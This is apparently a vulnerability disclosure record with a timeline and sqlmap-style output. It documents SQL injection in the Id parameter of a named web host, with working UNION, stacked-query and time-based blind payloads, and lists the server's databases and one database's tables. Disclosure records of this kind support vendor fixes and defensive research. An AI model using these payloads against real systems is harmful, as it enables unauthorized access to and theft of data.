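2016-01-11: Details reported to the vendor; awaiting vendor response
2016-01-15: Vendor confirmed; details disclosed to the vendor only
2016-01-25: Details disclosed to core white hats and experts in the relevant field
2016-02-04: Details disclosed to regular white hats
2016-02-14: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public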
http://jf.crcxf.com:8001/Service/EmployDetaile.aspx?Id=
Place: GET
Parameter: Id
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: Id=' UNION ALL SELECT 12,12,12,CHAR(58) CHAR(109) CHAR(102) CHAR(120) CHAR(58) CHAR(114) CHAR(74) CHAR(104) CHAR(113) CHAR(116) CHAR(75) CHAR(120) CHAR(76) CHAR(82) CHAR(65) CHAR(58) CHAR(117) CHAR(113) CHAR(100) CHAR(58),12,12--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Id='; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Id=' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] crcgas
[*] GPSDB
[*] hrejck
[*] hrrqrj20150201
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: hrejck
[35 tables]
+------------------------+
| DevTableSeting         |
| GoodsBoundary          |
| GoodsEmploy            |
| GoodsEmployDetail      |
| GoodsEmployDetail_Temp |
| GoodsEmploy_Temp       |
| GoodsOut               |
| GoodsOutDetail         |
| GoodsOutInStorage      |
| GoodsOutInStorage_Temp |
| GoodsStock             |
| GoodsStock_Use         |
| Goods_DisType          |
| RefundGoods            |
| RefundGoodsDetaile     |
| SysDepartment          |
| SysGoods               |
| SysMenuSysRole         |
| SysPerson              |
| SysRole                |
| SysRoleSysPerson       |
| SysStorage             |
| Temp_Receive0          |
| Temp_Receive1          |
| code                   |
| codelb                 |
| fldtable               |
| fldtable0              |
| menutree               |
| sysdiagrams            |
| test                   |
| v_GoodsOut             |
| v_GoodsUse             |
| v_Goodsstock           |
| v_syscolumns           |
+------------------------+
Severity: High
Vulnerability Rank: 15
Confirmed: 2016-01-15 15:01
Thank you for the submission
None yet